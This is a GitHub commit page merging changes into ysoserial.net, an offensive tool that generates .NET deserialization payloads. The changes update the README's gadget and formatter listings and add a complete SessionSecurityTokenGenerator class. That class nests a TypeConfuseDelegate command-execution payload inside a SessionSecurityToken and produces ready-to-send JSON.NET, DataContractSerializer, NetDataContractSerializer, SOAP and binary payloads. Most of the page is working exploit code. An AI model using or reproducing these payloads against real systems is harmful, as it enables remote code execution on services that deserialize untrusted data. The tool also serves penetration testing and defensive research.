Skip to content
Permalink
Browse files

Merge pull request #56 from irsdl/master

New gadget, bug fixing, typo fixing
  • Loading branch information
pwntester committed Feb 7, 2020
2 parents a40abcf + 91d7d2c commit 9cb75edc3b5b2ee92d587dbdecb5451738c0b125
@@ -24,50 +24,53 @@ This software is a personal project and not related with any companies, includin
## Usage
```
$ ./ysoserial -h
Missing arguments.
ysoserial.net generates deserialization payloads for a variety of .NET formatters.
Available gadgets:
ActivitySurrogateDisableTypeCheck (Disables 4.8+ type protections for ActivitySurrogateSelector, command is ignored.)
Formatters:
BinaryFormatter, ObjectStateFormatter, SoapFormatter, NetDataContractSerializer, LosFormatter
BinaryFormatter, LosFormatter, NetDataContractSerializer, ObjectStateFormatter, SoapFormatter
ActivitySurrogateSelectorFromFile (Another variant of the ActivitySurrogateSelector gadget. This gadget interprets the command parameter as path to the .cs file that should be compiled as exploit class. Use semicolon to separate the file from additionally required assemblies, e. g., '-c ExploitClass.cs;System.Windows.Forms.dll'.)
ActivitySurrogateSelector (This gadget ignores the command parameter and executes the constructor of ExploitClass class.)
Formatters:
BinaryFormatter, ObjectStateFormatter, SoapFormatter, LosFormatter
BinaryFormatter, LosFormatter, ObjectStateFormatter, SoapFormatter
ActivitySurrogateSelector (This gadget ignores the command parameter and executes the constructor of ExploitClass class.)
ActivitySurrogateSelectorFromFile (Another variant of the ActivitySurrogateSelector gadget. This gadget interprets the command parameter as path to the .cs file that should be compiled as exploit class. Use semicolon to separate the file from additionally required assemblies, e. g., '-c ExploitClass.cs;System.Windows.Forms.dll'.)
Formatters:
BinaryFormatter, ObjectStateFormatter, SoapFormatter, LosFormatter
BinaryFormatter, LosFormatter, ObjectStateFormatter, SoapFormatter
ObjectDataProvider (ObjectDataProvider gadget)
Formatters:
Xaml, Json.Net, FastJson, JavaScriptSerializer, XmlSerializer, DataContractSerializer, YamlDotNet < 5.0.0, FsPickler
DataContractSerializer, FastJson, FsPickler, JavaScriptSerializer, Json.Net, Xaml, XmlSerializer, YamlDotNet < 5.0.0
TextFormattingRunProperties (TextFormattingRunProperties gadget)
PSObject (PSObject gadget. Target must run a system not patched for CVE-2017-8565 (Published: 07/11/2017))
Formatters:
BinaryFormatter, ObjectStateFormatter, SoapFormatter, NetDataContractSerializer, LosFormatter
BinaryFormatter, LosFormatter, NetDataContractSerializer, ObjectStateFormatter, SoapFormatter
PSObject (PSObject gadget. Target must run a system not patched for CVE-2017-8565 (Published: 07/11/2017))
SessionSecurityToken (SessionSecurityTokenGenerator (System.IdentityModel.Tokens namespace) gadget)
Formatters:
BinaryFormatter, ObjectStateFormatter, SoapFormatter, NetDataContractSerializer, LosFormatter
BinaryFormatter, DataContractSerializer, Json.Net, LosFormatter, NetDataContractSerializer, ObjectStateFormatter, SoapFormatter
TextFormattingRunProperties (TextFormattingRunProperties gadget)
Formatters:
BinaryFormatter, LosFormatter, NetDataContractSerializer, ObjectStateFormatter, SoapFormatter
TypeConfuseDelegate (TypeConfuseDelegate gadget)
Formatters:
BinaryFormatter, ObjectStateFormatter, NetDataContractSerializer, LosFormatter
BinaryFormatter, LosFormatter, NetDataContractSerializer, ObjectStateFormatter
TypeConfuseDelegateMono (TypeConfuseDelegate gadget - Tweaked to work with Mono)
Formatters:
BinaryFormatter, ObjectStateFormatter, NetDataContractSerializer, LosFormatter
BinaryFormatter, LosFormatter, NetDataContractSerializer, ObjectStateFormatter
WindowsClaimsIdentity (WindowsClaimsIdentity (Microsoft.IdentityModel.Claims namespace) gadget)
Formatters:
BinaryFormatter, Json.Net, DataContractSerializer, NetDataContractSerializer, SoapFormatter
BinaryFormatter, DataContractSerializer, Json.Net, NetDataContractSerializer, SoapFormatter
WindowsIdentity (WindowsIdentity gadget)
Formatters:
BinaryFormatter, Json.Net, DataContractSerializer, NetDataContractSerializer, SoapFormatter
BinaryFormatter, DataContractSerializer, Json.Net, NetDataContractSerializer, SoapFormatter
Available plugins:
@@ -195,21 +198,25 @@ Special thanks to all contributors:

## Credits
```
$ ./ysoserial.exe --credit
ysoserial.net has been developed by Alvaro Muñoz (@pwntester)
Credits for available formatters:
ActivitySurrogateDisableTypeCheck
Nick Landers
ActivitySurrogateSelectorFromFile
James Forshaw
ActivitySurrogateSelector
James Forshaw
ActivitySurrogateSelectorFromFile
James Forshaw
ObjectDataProvider
Oleksandr Mirosh and Alvaro Munoz
TextFormattingRunProperties
Oleksandr Mirosh and Alvaro Munoz
PSObject
Oleksandr Mirosh and Alvaro Munoz
SessionSecurityToken
Soroush Dalili
TextFormattingRunProperties
Oleksandr Mirosh and Alvaro Munoz
TypeConfuseDelegate
James Forshaw
TypeConfuseDelegateMono
@@ -243,6 +250,7 @@ Credits for available plugins:
Various other people have also donated their time and contributed to this project.
Please see https://github.com/pwntester/ysoserial.net/graphs/contributors to find those who have helped developing more features or have fixed bugs.
```

## Additional Reading
@@ -367,7 +367,7 @@ public override object Generate(string cmd, string formatter, Boolean test, Bool
}";
if (minify)
{
payload = Helpers.YamlDotNet.Minify(payload);
payload = Helpers.YamlDocumentMinifier.Minify(payload);
}

if (test)
@@ -0,0 +1,265 @@
using System;
using System.Collections.Generic;
using System.IO;
using System.Runtime.Serialization;
using System.Xml;
using Newtonsoft.Json;
using System.Runtime.Serialization.Formatters.Soap;
using ysoserial.Helpers;
using System.IdentityModel.Tokens;
using System.Text.RegularExpressions;

namespace ysoserial.Generators
{
class SessionSecurityTokenGenerator : GenericGenerator
{
public override string Description()
{
return "SessionSecurityTokenGenerator gadget";
// Although it looks similar to WindowsIdentityGenerator but "actor" does not work in this context
}

public override List<string> SupportedFormatters()
{
return new List<string> { "BinaryFormatter", "ObjectStateFormatter", "Json.Net", "DataContractSerializer", "NetDataContractSerializer", "SoapFormatter", "LosFormatter" };
}

public override string Name()
{
return "SessionSecurityToken";
}

public override string Credit()
{
return "Soroush Dalili, @mufinnnnnnn";
}


[Serializable]
public class SessionSecurityTokenMarshal : ISerializable
{
public SessionSecurityTokenMarshal(string b64payload)
{
B64Payload = b64payload;
}

private string B64Payload { get; }

public void GetObjectData(SerializationInfo info, StreamingContext context)
{
info.SetType(typeof(SessionSecurityToken));
MemoryStream stream = new MemoryStream();

using (XmlDictionaryWriter xmlDictionaryWriter = XmlDictionaryWriter.CreateBinaryWriter(stream, null, null))
{
xmlDictionaryWriter.WriteStartElement("SecurityContextToken", "");

xmlDictionaryWriter.WriteStartElement("Version", "");
xmlDictionaryWriter.WriteValue("1");
xmlDictionaryWriter.WriteEndElement();

xmlDictionaryWriter.WriteElementString("SecureConversationVersion", "", (new Uri("http://schemas.xmlsoap.org/ws/2005/02/sc")).AbsoluteUri);

xmlDictionaryWriter.WriteElementString("Id", "", "1");

WriteElementStringAsUniqueId(xmlDictionaryWriter, "ContextId", "", "1");

xmlDictionaryWriter.WriteStartElement("Key", "");
xmlDictionaryWriter.WriteBase64(new byte[] { 0x01 }, 0, 1);
xmlDictionaryWriter.WriteEndElement();

WriteElementContentAsInt64(xmlDictionaryWriter, "EffectiveTime", "", 1);
WriteElementContentAsInt64(xmlDictionaryWriter, "ExpiryTime", "", 1);
WriteElementContentAsInt64(xmlDictionaryWriter, "KeyEffectiveTime", "", 1);
WriteElementContentAsInt64(xmlDictionaryWriter, "KeyExpiryTime", "", 1);

xmlDictionaryWriter.WriteStartElement("ClaimsPrincipal", "");
xmlDictionaryWriter.WriteStartElement("Identities", "");
xmlDictionaryWriter.WriteStartElement("Identity", "");
xmlDictionaryWriter.WriteStartElement("BootStrapToken", "");
xmlDictionaryWriter.WriteValue(B64Payload); // This is where the payload is
xmlDictionaryWriter.WriteEndElement();
xmlDictionaryWriter.WriteEndElement();
xmlDictionaryWriter.WriteEndElement();
xmlDictionaryWriter.WriteEndElement();

xmlDictionaryWriter.WriteEndElement();
xmlDictionaryWriter.Flush();

stream.Position = 0;

//Console.WriteLine(Encoding.ASCII.GetString(stream.ToArray()));

info.AddValue("SessionToken", stream.ToArray());

}
}

private void WriteElementContentAsInt64(XmlDictionaryWriter writer, String localName, String ns, long value)
{
writer.WriteStartElement(localName, ns);
writer.WriteValue(value);
writer.WriteEndElement();
}

private void WriteElementStringAsUniqueId(XmlDictionaryWriter writer, String localName, String ns, string id)
{
writer.WriteStartElement(localName, ns);
writer.WriteValue(id);
writer.WriteEndElement();
}

}

private string GetB64SessionToken(string b64encoded)
{
var obj = new SessionSecurityTokenMarshal(b64encoded);
string ndc_serialized = ysoserial.Helpers.DevTest.SerializersHelper.NetDataContractSerializer_serialize(obj);
Regex b64SessionTokenPattern = new Regex(@"\<SessionToken[^>]+>([^<]+)");
Match b64SessionTokenMatch = b64SessionTokenPattern.Match(ndc_serialized);
return b64SessionTokenMatch.Groups[1].Value;
}

public override object Generate(string cmd, string formatter, Boolean test, Boolean minify)
{
Generator binaryFormatterGenerator = new TypeConfuseDelegateGenerator();
byte[] binaryFormatterPayload = (byte[])binaryFormatterGenerator.Generate(cmd, "BinaryFormatter", false, minify);
string b64encoded = Convert.ToBase64String(binaryFormatterPayload);

if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase))
{
var obj = new SessionSecurityTokenMarshal(b64encoded);
return Serialize(obj, formatter, test, minify);
}
else if (formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase))
{
var obj = new SessionSecurityTokenMarshal(b64encoded);
return Serialize(obj, formatter, test, minify);
}
else if (formatter.Equals("objectstateformatter", StringComparison.OrdinalIgnoreCase))
{
var obj = new SessionSecurityTokenMarshal(b64encoded);
return Serialize(obj, formatter, test, minify);
}
else if (formatter.ToLower().Equals("json.net"))
{

string payload = "{'$type': 'System.IdentityModel.Tokens.SessionSecurityToken, System.IdentityModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', 'SessionToken':{'$type':'System.Byte[], mscorlib','$value':'" + GetB64SessionToken(b64encoded) + "'}}";

if (minify)
{
payload = Helpers.JSONMinifier.Minify(payload, new string[] { "System.IdentityModel" }, null);
}


if (test)
{
try
{
Object obj = JsonConvert.DeserializeObject<Object>(payload, new JsonSerializerSettings
{
TypeNameHandling = TypeNameHandling.Auto
});
}
catch
{
}
}
return payload;
}
else if (formatter.ToLower().Equals("datacontractserializer"))
{

string payload = $@"<root type=""System.IdentityModel.Tokens.SessionSecurityToken, System.IdentityModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""><SessionSecurityToken xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:x=""http://www.w3.org/2001/XMLSchema"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/"" xmlns=""http://schemas.datacontract.org/2004/07/System.IdentityModel.Tokens"">
<SessionToken i:type=""x:base64Binary"" xmlns="""">{GetB64SessionToken(b64encoded)}</SessionToken>
</SessionSecurityToken></root>";

if (minify)
{
payload = XMLMinifier.Minify(payload, null, null);
}

if (test)
{
try
{
var xmlDoc = new XmlDocument();
xmlDoc.LoadXml(payload);
XmlElement xmlItem = (XmlElement)xmlDoc.SelectSingleNode("root");
var s = new DataContractSerializer(Type.GetType(xmlItem.GetAttribute("type")));
var d = s.ReadObject(new XmlTextReader(new StringReader(xmlItem.InnerXml)));
}
catch
{
}
}
return payload;
}
else if (formatter.ToLower().Equals("netdatacontractserializer"))
{

string payload = $@"<root><w xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:x=""http://www.w3.org/2001/XMLSchema"" z:Id=""1"" z:Type=""System.IdentityModel.Tokens.SessionSecurityToken"" z:Assembly=""System.IdentityModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/"" xmlns="""">
<SessionToken z:Type=""System.Byte[]"" z:Assembly=""0"" xmlns="""">{GetB64SessionToken(b64encoded)}</SessionToken>
</w></root>";

if (minify)
{
payload = XMLMinifier.Minify(payload, null, null);
}

if (test)
{
try
{
var xmlDoc = new XmlDocument();
xmlDoc.LoadXml(payload);
XmlElement xmlItem = (XmlElement)xmlDoc.SelectSingleNode("root");
var s = new NetDataContractSerializer();
var d = s.ReadObject(new XmlTextReader(new StringReader(xmlItem.InnerXml)));
}
catch
{
}
}
return payload;
}
else if (formatter.ToLower().Equals("soapformatter"))
{

string payload = $@"<SOAP-ENV:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:SOAP-ENC=""http://schemas.xmlsoap.org/soap/encoding/"" xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" xmlns:clr=""http://schemas.microsoft.com/soap/encoding/clr/1.0"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/"">
<SOAP-ENV:Body>
<a1:SessionSecurityToken id=""ref-1"" xmlns:a1=""http://schemas.microsoft.com/clr/nsassem/System.IdentityModel.Tokens/System.IdentityModel%2C%20Version%3D4.0.0.0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3Db77a5c561934e089"">
<SessionToken href=""#ref-3""/>
</a1:SessionSecurityToken>
<SOAP-ENC:Array id=""ref-3"" xsi:type=""SOAP-ENC:base64"">{GetB64SessionToken(b64encoded)}</SOAP-ENC:Array>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
";

if (minify)
{
payload = XMLMinifier.Minify(payload, null, null, Helpers.FormatterType.SoapFormatter);
}

if (test)
{
try
{
byte[] byteArray = System.Text.Encoding.ASCII.GetBytes(payload);
MemoryStream ms = new MemoryStream(byteArray);
SoapFormatter sf = new SoapFormatter();
sf.Deserialize(ms);
}
catch
{
}
}
return payload;
}
else
{
throw new Exception("Formatter not supported");
}
}
}
}

0 comments on commit 9cb75ed

Please sign in to comment.
You can’t perform that action at this time.